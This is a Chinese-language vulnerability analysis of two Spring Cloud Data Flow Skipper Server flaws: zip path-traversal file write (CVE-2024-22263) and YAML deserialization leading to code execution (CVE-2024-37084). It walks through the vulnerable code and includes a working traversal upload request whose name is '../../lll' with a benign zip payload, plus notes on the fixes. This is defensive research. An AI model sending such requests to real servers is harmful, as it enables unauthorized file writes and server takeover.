Spring Cloud Data Flow 热点漏洞详细分析
环境搭建
2.10.0 - 2.11.2版本都可以,这里下的2.11.2
源码下载https://github.com/spring-cloud/spring-cloud-dataflow/tree/v2.11.2
在src/docker-compose里面是有docker文件的,使用docker即可
最近是爆出了两个漏洞的,不过入口都是一样的
任意文件写入
漏洞描述
https://avd.aliyun.com/detail?id=AVD-2024-22263
影响范围:2.10.0 - 2.11.2
Spring Cloud Data Flow(SCDF)是一个基于微服务的工具包,用于在 Cloud Foundry 和 Kubernetes 中构建流式和批量数据处理管道。在受影响版本中,Skipper Server在接收上传请求时对zip文件中的路径校验不严,具有 Skipper Server API 访问权限的攻击者可以通过上传请求将任意文件写入文件系统中的任意位置,从而获得服务器权限。
漏洞分析
我们根据阿里云给出的漏洞通告定位到上传zip文件的地方
来到PackageController.java
@RequestMapping(path = "/upload", method = RequestMethod.POST)
@ResponseStatus(HttpStatus.CREATED)
public EntityModel<PackageMetadata> upload(@RequestBody UploadRequest uploadRequest) {
return this.packageMetadataResourceAssembler.toModel(this.packageService.upload(uploadRequest));
}
跟进会来到packageService的upload方法
代码比较长,首先是进入validateUploadRequest(uploadRequest);
判断请求是否合法,跟进看看
private void validateUploadRequest(UploadRequest uploadRequest) {
Assert.notNull(uploadRequest.getRepoName(), "Repo name can not be null");
Assert.notNull(uploadRequest.getName(), "Name of package can not be null");
Assert.notNull(uploadRequest.getVersion(), "Version can not be null");
try {
Version.valueOf(uploadRequest.getVersion().trim());
}
catch (ParseException e) {
throw new SkipperException("UploadRequest doesn't have a valid semantic version. Version = " +
uploadRequest.getVersion().trim());
}
Assert.notNull(uploadRequest.getExtension(), "Extension can not be null");
Assert.isTrue(uploadRequest.getExtension().equals("zip"), "Extension must be 'zip', not "
+ uploadRequest.getExtension());
Assert.notNull(uploadRequest.getPackageFileAsBytes(), "Package file as bytes must not be null");
Assert.isTrue(uploadRequest.getPackageFileAsBytes().length != 0, "Package file as bytes must not be empty");
PackageMetadata existingPackageMetadata = this.packageMetadataRepository.findByRepositoryNameAndNameAndVersion(
uploadRequest.getRepoName().trim(), uploadRequest.getName().trim(), uploadRequest.getVersion().trim());
if (existingPackageMetadata != null) {
throw new SkipperException(String.format("Failed to upload the package. " + "" +
"Package [%s:%s] in Repository [%s] already exists.",
uploadRequest.getName(), uploadRequest.getVersion(), uploadRequest.getRepoName().trim()));
}
}
首先是对一个属性值的检测,不能为null
然后扩展也就是文件名后缀必须为zip
然后读取数据是通过getPackageFileAsBytes来读取的,根据旁边的报错也知道必须是array型的byte
回到uoplaod方法
来到Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
跟进方法
private Repository getRepositoryToUpload(String repoName) {
Repository localRepositoryToUpload = this.repositoryRepository.findByName(repoName);
if (localRepositoryToUpload == null) {
throw new SkipperException("Could not find local repository to upload to named " + repoName);
}
if (!localRepositoryToUpload.isLocal()) {
throw new SkipperException("Repository to upload to is not a local database hosted repository.");
}
return localRepositoryToUpload;
}
可以看到localRepositoryToUpload是必须有值的是从repositoryRepository里面找的
调试发现其中只有一个local,如果不抛出异常,我们的repoName只是为local
回到upload
重点看到
Path packageFile = Paths
.get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-"
+ uploadRequest.getVersion() + "." + uploadRequest.getExtension());
Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");
Files.write(packageFile, uploadRequest.getPackageFileAsBytes());
把我们的数据写入到packageFile中,然后进行解压到packageDir下
ZipUtil.unpack(packageFile.toFile(), packageDir);
packgdir是没有过滤../这种目录穿越字符
File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
我们可以解压文件到任意目录下,然后getshell就轻而易举了
漏洞复现
首先我们需要制作一个zip文件,然后测试漏洞存在的话数据其实不重要的,能证明解压到任意目录就ok
新建一个文件,然后压缩为zip文件,之后使用脚本
def zip_to_byte_list(zip_file_path):
with open(zip_file_path, 'rb') as file:
zip_data = file.read()
return [byte for byte in zip_data]
zip_file_path = '1.zip'
zip_byte_list = zip_to_byte_list(zip_file_path)
print(zip_byte_list)
转为byte
内容如下
[80, 75, 3, 4, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 49, 46, 116, 120, 116, 80, 75, 1, 2, 20, 0, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 36, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 49, 46, 116, 120, 116, 10, 0, 32, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 165, 60, 191, 106, 174, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 80, 75, 5, 6, 0, 0, 0, 0, 1, 0, 1, 0, 87, 0, 0, 0, 35, 0, 0, 0, 0, 0]
然后发送请求包,通过name来实现目录穿越
{"repoName":"local","name":"../../lll","version":"1.1.1","extension":"zip","packageFileAsBytes":[80, 75, 3, 4, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 49, 46, 116, 120, 116, 80, 75, 1, 2, 20, 0, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 36, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 49, 46, 116, 120, 116, 10, 0, 32, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 165, 60, 191, 106, 174, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 80, 75, 5, 6, 0, 0, 0, 0, 1, 0, 1, 0, 87, 0, 0, 0, 35, 0, 0, 0, 0, 0]}
进入lll目录,查找是否有1.txt即可
漏洞修复
可以看到对路径做了标准化的处理
YAML反序列化
本质上原因和CVE-2024-22263是一样的,都是upload接口造成的危害,只是sink点不一样
漏洞描述
参考https://avd.aliyun.com/detail?id=AVD-2024-37084
Spring Cloud Data Flow(SCDF)是一个基于微服务的工具包,用于在 Cloud Foundry 和 Kubernetes 中构建流式和批量数据处理管道。在受影响版本中Skipper 服务器在处理文件上传时没有对路径进行验证,拥有 Skipper 服务器 API 访问权限攻击者可以通过构造恶意请求将 YAML 文件写入服务器的任意位置,同时由于 PackageMetadata 的创建过程中使用默认构造器反序列化 YAML 数据,从而导致任意代码执行。
漏洞分析
可以看到是yaml反序列化的漏洞,是通过写yaml文件来反序列化的
依然来到/api/package/upload这个接口
漏洞触发点是在DefaultPackageReader的read方法
在upload中
只要不抛出异常,就会执行read方法
然后isTrue就是判断我们的unzippedPath是否存在,这个path是来自
String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName()
+ "-" + uploadRequest.getVersion();
如果输入的是lll,拼起来就是lll-1.1.1,但是实际解压的时候我们的就是lll,其实解决办法很简单,就是重新创建一个文件夹,叫做lll-1.1.1就好了
下面才是关键,进入read方法
传入的参数是unpackagedFile,也就是解压后的文件
主要漏洞点出现在
这里会判断我们的文件名(解压后)是否等于package.yaml或者package.yml
如果等于调用loadPackageMetadata方法去加载
private PackageMetadata loadPackageMetadata(File file) {
// The Representer will not try to set the value in the YAML on the
// Java object if it isn't present on the object
DumperOptions options = new DumperOptions();
Representer representer = new Representer(options);
representer.getPropertyUtils().setSkipMissingProperties(true);
LoaderOptions loaderOptions = new LoaderOptions();
Yaml yaml = new Yaml(new Constructor(PackageMetadata.class, loaderOptions), representer);
String fileContents = null;
try {
fileContents = FileUtils.readFileToString(file);
}
catch (IOException e) {
throw new SkipperException("Error reading yaml file", e);
}
PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);
return pkgMetadata;
}
可以看见就是把文件内容读取出来,然后放入yaml.load去反序列化
漏洞修复
使用的yaml是继承自 SnakeYAML 的 SafeConstructor,SafeConstructor 是一个更加安全的 YAML 解析器